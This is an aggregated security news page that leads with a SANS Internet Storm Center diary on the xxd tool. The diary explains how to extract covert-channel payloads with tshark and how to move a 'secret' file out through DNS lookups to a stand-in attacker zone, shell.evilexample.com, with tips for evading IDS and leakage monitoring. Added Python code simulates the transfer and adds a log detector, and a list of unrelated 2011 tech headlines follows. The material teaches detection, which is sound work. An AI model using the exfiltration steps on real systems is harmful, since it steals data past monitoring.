InfoSec News

I just got done teaching FOR558, our relatively new Network Forensics class. Great students and some great side discussions. One of these side discussions involved 'xxd', a tool that can be used to create a hex dump from a binary file or reverse a hex dump back into a binary file. For example:
xxd index.html | head -1

0000000: 3c21 444f 4354 5950 4520 6874 6d6c 200a  <!DOCTYPE html .


The tool is even flexible enough to be used from vi (try: vi -b file, then :%!xxd to turn the buffer into a hex dump, and :%!xxd -r to turn it back into binary before saving).
The tool is very handy; two uses came up in class:
1. Stripping headers and extracting data from a covert channel.
One method to establish a covert channel is to take the original packet and wrap it into an encapsulating header, for example an ICMP or a DNS packet. The trick is to extract the payload, save it in a new file, and treat it as a new packet. The 'packetstan' blog [1] outlines one way to do so via scapy, but scapy is not as commonly installed and available as other tools, like for example tshark (and, well, xxd).
tshark can easily be used to extract the payload in hexadecimal format (add -r <capture file> to read from a saved capture rather than a live interface):
tshark -T fields -e data
To convert the hexadecimal payload into a binary file, just run it through xxd and redirect the result to a file:
tshark -T fields -e data | xxd -r -p
With -p, xxd -r accepts a plain stream of hex digits and skips whitespace and other separators between bytes; without it, xxd -r expects the offset-and-column layout that xxd itself produces. Two things to check: -e data only yields the part of the packet tshark left undissected, so if the carrier is fully dissected (DNS, for example) you have to name the field that holds the hidden data instead; and what comes out is a bare packet, not a capture file, so to open it in Wireshark run it through od -Ax -tx1 -v and text2pcap (with -l set to the link type of the inner packet, e.g. 101 for raw IP).
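The following is an added example, not code from the original diary: a small Python model of the two xxd layouts contrasted above, so the difference between what `xxd -r` and `xxd -r -p` accept on input is explicit. The sample bytes are constructed for the example (the first 16 bytes of an HTML file, as in the index.html dump above).

```python
# Added example, not code from the original diary: a Python model of xxd's
# default hexdump layout versus its plain (-p) stream, and the reverse of both.
import re

# One line of `xxd` output: offset, colon, hex groups, two spaces, ASCII column.
_XXD_LINE = re.compile(r"^\s*([0-9a-fA-F]+):\s*([0-9a-fA-F ]*?)(?:\s{2}.*)?$")


def xxd_dump(data: bytes, cols: int = 16) -> list[str]:
    """Render data in xxd's default layout (what `xxd` alone prints).
    Modern xxd prints an 8-digit offset; the 7-digit offset in the diary's
    sample output comes from an older build."""
    lines = []
    width = cols * 2 + (cols + 1) // 2 - 1          # hex area incl. group spaces
    for off in range(0, len(data), cols):
        chunk = data[off:off + cols]
        groups = [chunk[i:i + 2].hex() for i in range(0, len(chunk), 2)]
        text = "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in chunk)
        lines.append(f"{off:08x}: {' '.join(groups).ljust(width)}  {text}")
    return lines


def xxd_plain(data: bytes, cols: int = 30) -> list[str]:
    """Render data as `xxd -p` does: a bare hex stream, 30 bytes (60 hex
    digits) per line by default."""
    hexstr = data.hex()
    return [hexstr[i:i + cols * 2] for i in range(0, len(hexstr), cols * 2)]


def xxd_revert(text: str, plain: bool = False) -> bytes:
    """Reverse a dump back to bytes.

    plain=True  (`xxd -r -p`): every hex digit in the input is consumed in
        order; whitespace and any other separator (e.g. the ':' some tshark
        versions put between bytes) is skipped.
    plain=False (`xxd -r`): each line must carry an offset and hex groups;
        only the groups between the colon and the double space are decoded,
        so the ASCII column (which can itself contain hex-looking characters)
        is ignored, and the offset is honoured the way xxd -r seeks.
    """
    if plain:
        digits = re.sub(r"[^0-9a-fA-F]", "", text)
        if len(digits) % 2:
            raise ValueError("odd number of hex digits in plain dump")
        return bytes.fromhex(digits)
    out = bytearray()
    for line in text.splitlines():
        if not line.strip():
            continue
        m = _XXD_LINE.match(line)
        if not m:
            raise ValueError(f"not an xxd hexdump line: {line!r}")
        offset = int(m.group(1), 16)
        chunk = bytes.fromhex(m.group(2).replace(" ", ""))
        if offset > len(out):                       # gap: xxd -r seeks, leaving zeros
            out.extend(b"\0" * (offset - len(out)))
        out[offset:offset + len(chunk)] = chunk
    return bytes(out)


if __name__ == "__main__":
    sample = b"<!DOCTYPE html \n"      # constructed: first 16 bytes of an HTML file
    for line in xxd_dump(sample):
        print(line)
    print(xxd_plain(sample)[0])
    assert xxd_revert("\n".join(xxd_dump(sample))) == sample
    assert xxd_revert("3c:21:44:4f", plain=True) == b"<!DO"
```

The plain decoder is the one to reach for on tool output (tshark, a query log, a pasted blob), because it does not care how the digits are laid out; the default decoder is only for dumps that xxd itself produced.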
2. File transfer via DNS
Another nice idea I demoed in class is a file transfer via DNS that works without special tools. For pentesters, this is helpful as it will first of all sneak past many firewalls, and secondly you do not need to install any special tools that may be picked up by anti-malware.
This idea is along the lines of what is discussed in Kevin Bong's SANS Master's project [2].
First, we convert the file to be transferred into a hex stream via xxd:
xxd -p secret > file.hex
Next, we read file.hex line by line and issue one DNS lookup per line, with the hex line as the leftmost label of a name under shell.evilexample.com (i.e. <hexline>.shell.evilexample.com), using whatever resolver client is already on the system. xxd -p emits 60 hex characters per line, which fits inside the 63-character limit of a single DNS label.
On the client this does not need special privileges. On the DNS server, we can capture the messages via tcpdump or the query log:
tcpdump -w /tmp/dnsdemo -s0 port 53 and host system.example.com
Then, we extract the messages from the packet capture:
tcpdump -r /tmp/dnsdemo -n | grep shell.evilexample.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq > received.txt
(The field number for cut depends on your tcpdump's output format; check one line by hand first.) The uniq may not be necessary, but I find that the DNS messages may be resent once in a while if the response isn't fast enough. Note that uniq only collapses adjacent duplicates, which is what you want for a retransmit, but it will also drop a legitimate chunk that happens to be identical to the one before it (two 30-byte lines from a run of zero bytes, for example); if that matters, number the chunks.
Finally, just reverse the hex encoding:
xxd -r -p received.txt > secret
And you are done! FTDNS (File Transfer via DNS) without installing any special tools on system.example.com.
Bonus: shorter lines from xxd (xxd -p -c <bytes>) and maybe a quick xor may make it even harder for an IDS/data leakage system to see this kind of data.
Defense: Watch your DNS logs! A leftmost label that is long and consists only of hex digits, and a burst of distinct names under one zone from a single client, are what this transfer looks like in the log.
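The transfer and the defense above, round-tripped offline in Python as an added example (not code from the original diary). The sender side mirrors xxd -p (30 bytes, 60 hex digits per line, one DNS label each); the receiver side mirrors the grep | cut | uniq pipeline over constructed tcpdump-style lines; flag_suspicious() is the log check the defense calls for. The zone name is the diary's; the IP addresses, query ids and log lines are constructed. The numbered=True variant (a sequence label in front of each chunk) goes beyond the diary: it is added here to show the case where uniq would lose a chunk.

```python
# Added example, not code from the original diary: DNS file transfer
# (sender, receiver) and the matching log detection, simulated offline.
import re
from collections import Counter

ZONE = "shell.evilexample.com"      # zone from the diary, assumed attacker-controlled
LABEL_HEX = 60                      # xxd -p default line: 30 bytes = 60 hex digits

# `tcpdump -n` prints a query as '... <id>+ A? <name>. (<len>)'; capture <name>.
_QUERY = re.compile(r"\b(?:A|AAAA|TXT)\? (\S+?)\.? ")
_HEX_LABEL = re.compile(r"^[0-9a-f]{20,63}$")


def encode_queries(data: bytes, zone: str = ZONE, numbered: bool = False) -> list[str]:
    """Names the client looks up, one per xxd -p line: <hex>.<zone>.
    With numbered=True each name gets a leading sequence label so the
    receiver can order and de-duplicate without `uniq` (an addition)."""
    hexstr = data.hex()
    chunks = [hexstr[i:i + LABEL_HEX] for i in range(0, len(hexstr), LABEL_HEX)]
    if numbered:
        return [f"{n}.{c}.{zone}" for n, c in enumerate(chunks)]
    return [f"{c}.{zone}" for c in chunks]


def simulate_capture(names: list[str], retransmit=(1,)) -> list[str]:
    """Constructed tcpdump -n style lines: one benign query, then one line
    per name, with the names at `retransmit` indexes sent twice (the
    resolver retry the diary mentions)."""
    lines = ["12:00:00.000000 IP 192.0.2.10.40000 > 198.51.100.1.53: 999+ A? www.example.com. (33)"]
    for i, name in enumerate(names):
        line = (f"12:00:01.{i:06d} IP 192.0.2.10.4{i:04d} > 198.51.100.1.53: "
                f"{1000 + i}+ A? {name}. (44)")
        lines.append(line)
        if i in retransmit:
            lines.append(line)
    return lines


def extract_chunks(lines: list[str], zone: str = ZONE, numbered: bool = False) -> list[str]:
    """grep zone | cut -f9 -d' ' | cut -f1 -d'.' | uniq, in Python.
    `uniq` only collapses adjacent duplicates: that handles a retransmit
    but also swallows a legitimate chunk identical to the previous one.
    numbered=True keys on the sequence label instead and avoids that."""
    by_seq, ordered, last = {}, [], None
    for line in lines:
        m = _QUERY.search(line)
        if not m or not m.group(1).endswith("." + zone):
            continue
        labels = m.group(1).split(".")
        if numbered:
            by_seq[int(labels[0])] = labels[1]
        else:
            if labels[0] != last:
                ordered.append(labels[0])
            last = labels[0]
    return [by_seq[k] for k in sorted(by_seq)] if numbered else ordered


def decode_chunks(chunks: list[str]) -> bytes:
    """xxd -r -p over the received lines."""
    return bytes.fromhex("".join(chunks))


def flag_suspicious(lines: list[str], min_queries: int = 3) -> dict[str, int]:
    """Defense: count queries per zone whose data label (leftmost, or second
    behind a short sequence label) is long and all hex. Some CDN hostnames
    use hex-like labels, so the per-zone count, not a single hit, is the alert."""
    per_zone = Counter()
    for line in lines:
        m = _QUERY.search(line)
        if not m:
            continue
        labels = m.group(1).split(".")
        for i in (0, 1):
            if i < len(labels) - 1 and _HEX_LABEL.match(labels[i]):
                per_zone[".".join(labels[i + 1:])] += 1
                break
    return {z: n for z, n in per_zone.items() if n >= min_queries}


if __name__ == "__main__":
    # constructed payload: two identical 30-byte zero chunks expose the uniq problem
    payload = b"\0" * 60 + b"secret key material\n"
    cap = simulate_capture(encode_queries(payload))
    print(decode_chunks(extract_chunks(cap)) == payload)                  # False: uniq ate a chunk
    cap = simulate_capture(encode_queries(payload, numbered=True))
    print(decode_chunks(extract_chunks(cap, numbered=True)) == payload)   # True
    print(flag_suspicious(cap))
```

The detector deliberately keys on shape (long, all-hex leftmost label, many distinct names under one zone) rather than on the zone name, since the zone is the one thing the attacker picks freely; the xor trick from the bonus keeps the labels hex, so it does not defeat this check, but shorter lines (-c) push them under the length threshold and are the reason to also watch per-zone query counts.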
[1] http://www.packetstan.com/2010/11/packet-payloads-encryption-and-bacon.html

[2] http://sans.edu/student-files/presentations/ftp_nslookup_withnotes.pdf
------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Eastman Kodak's patent claim against Apple and Research In Motion concerning camera-phone image previews is invalid, according to an initial determination by a U.S. International Trade Commission administrative law judge.
 
Users of the 4chan online message board managed to get access to the online student information system used by a New Jersey school district after the school's administrative password was posted to 4chan last week.
 
Just like legitimate developers, malware makers want the best return on their investment, a researcher said on Monday, pointing to the Carberp virus.
 
Hewlett-Packard has invited journalists to an event March 14 where CEO Léo Apotheker is expected to lay out his plans for the company, including anticipated greater investments in enterprise software.
 
Hewlett-Packard has officially consigned its Neoview to history, less than four years after introducing it to the market as the company's core offering in the Business Intelligence space.
 
The current crop of Internet addresses could start to disappear this week if a regional Internet registry makes one more request for two blocks of addresses.
 

Changing the Status Quo for Security
CTO Edge
... showcasing new and emerging technologies and offering practical and professional expertise. For further information please visit www.infosec.co.uk)

 
VMware's fourth-quarter revenue jumped 37 percent as businesses increased spending on its virtualization software, the company announced Monday.
 
Two-thirds of U.S. Internet connections are at speeds less than 5 Mbit/sec., putting the U.S. well behind speed leaders South Korea and Japan.
 
Modern energy efficient technologies are becoming the norm, and most businesses understand that implementing "green IT" helps the environment and the bottom line. But many IT professionals lack a tool that is critical to understanding the full impact of energy efficient practices.
 
 
[CFP] LACSEC 2011: 6th Network Security Event for Latin America and the Caribbean
 
Pope Benedict XVI Monday gave his blessing to social networking, urging Catholic Internet users to adopt a respectful Christian netiquette when spreading the Gospel online.
 
Oracle's plans for Java seem to constrain the language to the enterprise, analysts assert
 
Motorola's Xoom tablet will start shipping Feb 17 and will cost about $700, according to Engadget.com.
 
The Clorox company brought in a new CIO to re-establish control of the company’s tech direction, bring IT up to date and generate business value.
 
Information is the lifeblood of business. Valuable corporate data is available to employees, business partners and contractors. It is accessed locally, in the cloud and virtual environments, providing instant access to non-public sensitive information. Making matters worse, employees typically do not ask permission to load third-party software or applications on their laptops and mobile phones -- devices that are connected to their companies' networks and data stores.
 
The new -- and divided -- Congress should find some early agreement on a variety of scaled-back technology bills, analysts say.
 
The departure of longtime Microsoft executive Bob Muglia could prove troubling because the head of the Server and Tools Business was held in high esteem by the company's technical talent, industry watchers say.
 
The proposal, which transmits a special HTTP header to websites, may be supported in future versions of Firefox, but in order for it to fully work, websites must also support the feature.

 
Social media career job opportunities tripled in 2010, as compared to 2009. Here's what you need to know about 3 hot positions, plus expert do's and don'ts when you're applying for social media jobs.
 
A day after Mozilla said it was exploring a "Do Not Track" feature for Firefox, Google announced a Chrome add-on that lets users opt out of tracking cookies that monitor their activity online.
 
Eric Schmidt is getting an impressive parting gift of $100 million as he departs Google as CEO, but remains with the company as executive chairman.
 
Twitter's advertising revenue will reach $150 million in 2011 and $250 million next year, according to digital marketing research company eMarketer.
 
Reader Matt Ernst seeks the magic bullet for wirelessly printing from his iPad. He writes:
 
Opera Web Browser 'Select' HTML Element Integer Overflow Vulnerability
 
The price of DRAM, the main memory chips inside personal computers, may tick up in coming months as stronger demand for laptop and desktop computers with new microprocessors from Intel and AMD drives stronger PC buying, analysts and market researchers say.
 
Google Chrome prior to 8.0.552.237 Multiple Security Vulnerabilities
 
Two leading network vendors -- Cisco System and Verizon Business -- have enlisted in an upcoming trial-by-fire of IPv6, the long-anticipated upgrade to the Internet's main communications protocol called IPv4.
 
AWStats Unspecified 'LoadPlugin' Directory Traversal Vulnerability
 
[USN-1048-1] Tomcat vulnerability
 
[USN-1047-1] AWStats vulnerability
 
[SECURITY] [DSA 2150-1] request-tracker3.6 security update
 
phpcms V9 Blind SQL Injection Vulnerability
 
Asus70 asked the Laptops forum for speed-up tips.
 
A piece of banking malware that researchers have been keeping an eye on is adding more sophisticated capabilities to stay hidden on victims' PCs, according to the vendor Seculert.
 
Microsoft's flagship backup and archiving software, Data Protection Manager, has come a long way since we first tested it in 2005.
 
Bored with the usual characters at work? Cue Doris Day, a stylish little brush script from designer Mario Arturo. Named for the patron saint of romantic romps, Doris Day arrives loaded with thoroughly modern charm.
 
The TomTom GO 2505-TM has virtually every feature that you could want in a nonconnected navigation device. And, the company packs all of that into a striking, slim chassis.
 
Editors’ Note: Each week the Macalope skewers the worst of the week’s coverage of Apple and other technology companies. In addition to being a mythical beast, the Macalope is not an employee of Macworld. As a result, the Macalope is always free to criticize any media organization. Even ours.
 
Socialtext, Yammer, Salesforce.com's Chatter and other social collaboration platforms have a new rival in the form of Tibbr, a product that creator Tibco hopes will be the standard for large enterprises.
 
While the standard screen size for GPS navigation devices is 4.3 inches (diagonal), a number of devices now have larger screens. Magellan launched a limited number of devices with 4.7-inch screens last year and expanded the number of different RoadMate 4.7-inch devices to seven, including the RoadMate 3065. But for my driving, I prefer a GPS unit with a 5.0-inch (dia.) screen. The new RoadMate 5045 series features such a 5.0-inch screen and most, but not all, of the features needed to make it an ideal navigation companion.
 
One of the challenges of buying a GPS navigation device is to figure out just which set of features you want. The other lies in deciphering the differences among models in a product line--in this case, the difference between the Nuvi 1350T ($180 list, as of January 21, 2011) and the Nuvi 1370T. One need look no further than the list prices of these two models to know there’s a difference: The similarly featured 1370T is priced at $250 (as of January 21, 2011).
 
Each of the GPS manufacturers offers an almost dizzying array of products--each with just slightly different features. The key challenge in buying a GPS navigation device is to determine which features are must-haves and which ones would just be nice to have. Once you make that determination, buying the perfect GPS becomes simpler. Over the past several years, larger screens have been the trend for dashboard GPS devices. Devices with a 4.3-inch screen have almost completely replaced devices with 3.5-inch screens. Still, some people might prefer a smaller screen device. And, often, but not always, the smaller screens could mean a cheaper price. Such is the case with the Garmin Nuvi 1260T.
 
If you're shopping for a bargain-priced GPS, searching for the previous year's models is often a good place to start. One of the current best finds is the Garmin Nuvi 265WT. While it still carries a hefty list price of $220 on the Garmin Website (as of 1/21/2011), you can generally find it online for $100 less.
 
While a 4.3-inch screen has become the standard size for personal navigation devices, the upgrade to a 5.0-inch screen can make a significant difference. TomTom has two series of XXL products with 5.0-inch screens, the XXL 540-TM and the XXL 550-TM reviewed here ($230, price as of 1/5/2011). At one time, such an upgrade carried a huge premium, but no more: Now the premium can be as little as $40.
 
The TomTom XL 350-TM ($170, price as of 1/5/2011) should appeal to both existing fans of TomTom navigators and newcomers alike. Like other models in the XL 350 series, this unit boasts a 4.3-inch touchscreen.
 
CultBooking 'cultbooking.php' Local File Include and Multiple Cross Site Scripting Vulnerabilities
 
Network demand will explode, fueled by unexpected growth in ambient video, like puppy cams and surveillance video, according to reports from the 33rd Pacific Telecommunications Council (PTC) conference held last week in Hawaii.
 
In the months since we reviewed version 5 of Google’s Chrome Web browser ( Macworld rated 4 out of 5 mice ), the developers in Mountain View have not been slacking off. The latest stable release of this contender for the Mac browser crown now stands at version 8 and counting. While it doesn’t pack many major improvements, the new features it does sport are welcome and well implemented. More importantly, its increased speed and standards compliance help Chrome 8 largely leave the latest version of Safari eating its dust.
 
Gallery Arbitrary File Upload Vulnerability
 
Hewlett-Packard reshuffled its board last week, adding some prominent tech and business veterans that may help it escape its turbulent past and give its CEO, Leo Apotheker, some help.
 
Set for April release, open source IDE includes capabilities for Java SE 7 and Oracle WebLogic Server
 
If you thought the Federal Communications Commission’s vote to approve limited net neutrality rules were the end of the dispute, think again.
 
Mozilla, the developer of the Firefox browser, is working on a feature that will allow users to opt out of online behavioral advertising.
 
SSSD 'pam_parse_in_data_v2()' Local Denial of Service Vulnerability
 
In a down economy, IT isn't going anywhere without Finance. Here's what CFOs would like you to know before you come knocking.
 
Business intelligence systems can be used to analyze data about a company's progress in meeting its environmental goals.
 
Intrusion-protection systems, on average, are getting better at blocking external security threats. But the default settings can produce effectiveness rates as low as 31%, so tuning is crucial to improving the performance of some products.
 
In a Forrester Research survey about investments in ERP systems, 72% of the companies polled said they are 'in a holding pattern for 2011.'
 
Surveys show that 61% of hiring managers expect to increase pay to existing employees; and smaller employers are making fewer cuts in benefits than larger employers.
 
Kathryn Akerman, CIO at Hurley Travel Experts, says that in addition to personal service, her company can offer faster and more complex booking interfaces than customers typically see on online sites.
 
 
A security manager in a new job is like a gardener assessing the threats that lie below the rocks.
 
In theory, an enterprise app store would allow employees to easily download the software they need, but the idea faces many hurdles, a Gartner analyst says.
 
Follow these 7 tips to protect your IT assets -- and essential company data -- from a service provider breakup gone bad
 
A-V Tronics InetServ SMTP Denial of Service Vulnerability
 
InfoSec News: Is retaliation the answer to cyber attacks?: http://www.networkworld.com/news/2011/012011-retaliation-answer-cyber-attacks.html
By Ellen Messmer Network World January 21, 2011
WASHINGTON, DC -- Should revenge assaults be just another security tool large IT shops use to counter cyber attacks? [...]
 
InfoSec News: Phone-hacking scandal: Scotland Yard accused over investigations: http://www.guardian.co.uk/media/2011/jan/23/phone-hacking-scandal-scotland-yard
By Polly Curtis and James Robinson guardian.co.uk 23 January 2011
Criticisms of the police handling of the phone-hacking scandal intensified tonight after a minister accused Scotland Yard of failing to [...]
 
InfoSec News: Apple taps Navy techie for global security head: http://news.cnet.com/8301-13579_3-20029280-37.html
By Arik Hesseldahl Apple CNet News January 23, 2011
Apple has tapped security expert and author David Rice to be its director of global security, several sources have confirmed to me. He's expected to start at Apple in March. [...]
 
InfoSec News: Got $500? You can buy a hacked U.S. military website: http://www.computerworld.com/s/article/9205905/Got_500_You_can_buy_a_hacked_U.S._military_website
By Robert McMillan IDG News Service January 21, 2011
If you're a criminal looking for full control of the Web used by the U.S. Army's Communications-Electronics Command (CECOM), you can get it [...]
 
InfoSec News: Iranian Police Sets Up Cyber Force: http://english.farsnews.com/newstext.php?nn=8911031262
Fars News Agency 24 Jan 2011
TEHRAN (FNA)- Iran's Cyber Police started its work today to prevent espionage and sabotage activities through the internet, a police official announced on Sunday. [...]
 
Request Tracker Password Information Disclosure Vulnerability
 
Golden FTP Server PASS Command Remote Buffer Overflow Vulnerability
 
We tested RedHat Enterprise Linux 6 on various hypervisor platforms, including VMware, XenServer, and RedHat in our NOC. NOC hardware includes Dell and HP 8 and 16 core AMD and Intel-based servers, a Compellent FC/iSCSI SAN, Extreme Networks switches, along with Windows 2008R2, Apple XServe, and other Linux servers, some in VMs.
 
Three years in the making, Red Hat Enterprise Linux ( RHEL) 6 is a gutsy, green upgrade that features native support for KVM, the Linux kernel-based virtual machine.
 
We set up System Center: Data Protection Manager on a Gigabit Ethernet network consisting of Windows 2008 R2 and Windows 2003 R2 servers, as well as virtualized Windows 7 and Windows XP SP4 clients.
 
Gibbs doesn't believe that technology is the cause of all of our social ills …
 
Five years makes an official franchise, no? Either way, what follows is a truncated-for-print version of our fifth annual collection of the year's "25 Geekiest 25th anniversaries."
 

Posted by InfoSec News on Jan 24

http://www.networkworld.com/news/2011/012011-retaliation-answer-cyber-attacks.html

By Ellen Messmer
Network World
January 21, 2011

WASHINGTON, DC -- Should revenge assaults be just another security tool
large IT shops use to counter cyber attacks?

It's a controversial idea, and the law generally frowns on cyber attacks
in general, but at the Black Hat DC conference last week, some speakers
took up the issue of whether and how organizations...
 

Posted by InfoSec News on Jan 24

http://www.guardian.co.uk/media/2011/jan/23/phone-hacking-scandal-scotland-yard

By Polly Curtis and James Robinson
guardian.co.uk
23 January 2011

Criticisms of the police handling of the phone-hacking scandal
intensified tonight after a minister accused Scotland Yard of failing to
properly investigate the allegations, while it emerged that Gordon Brown
has asked police to establish whether he has been a victim.

Chris Huhne, the Liberal...
 

Posted by InfoSec News on Jan 24

http://news.cnet.com/8301-13579_3-20029280-37.html

By Arik Hesseldahl
Apple
CNet News
January 23, 2011

Apple has tapped security expert and author David Rice to be its
director of global security, several sources have confirmed to me. He's
expected to start at Apple in March.

Apple hasn't returned calls seeking comment.

There's no word yet about what precisely Rice's job will entail, and
knowing secrecy-obsessed Apple, there likely won't...
 

Posted by InfoSec News on Jan 24

http://www.computerworld.com/s/article/9205905/Got_500_You_can_buy_a_hacked_U.S._military_website

By Robert McMillan
IDG News Service
January 21, 2011

If you're a criminal looking for full control of the Web used by the
U.S. Army's Communications-Electronics Command (CECOM), you can get it
for just under US$500.

At least that's what one hacker is offering in underground forums.
Security vendor Imperva found the black market sales pitch...
 

Posted by InfoSec News on Jan 24

http://english.farsnews.com/newstext.php?nn=8911031262

Fars News Agency
24 Jan 2011

TEHRAN (FNA)- Iran's Cyber Police started its work today to prevent
espionage and sabotage activities through the internet, a police
official announced on Sunday.

"The Cyber Police can prevent espionage and sabotage in Information
Technology (IT) tools," Head of the Information Production and Exchange
Department of the Law Enforcement...
 
Sepaton announced version 6.0 of its grid-based backup and deduplication appliance, which now supports 64-bit architectures and doubles the throughput of the device.
 

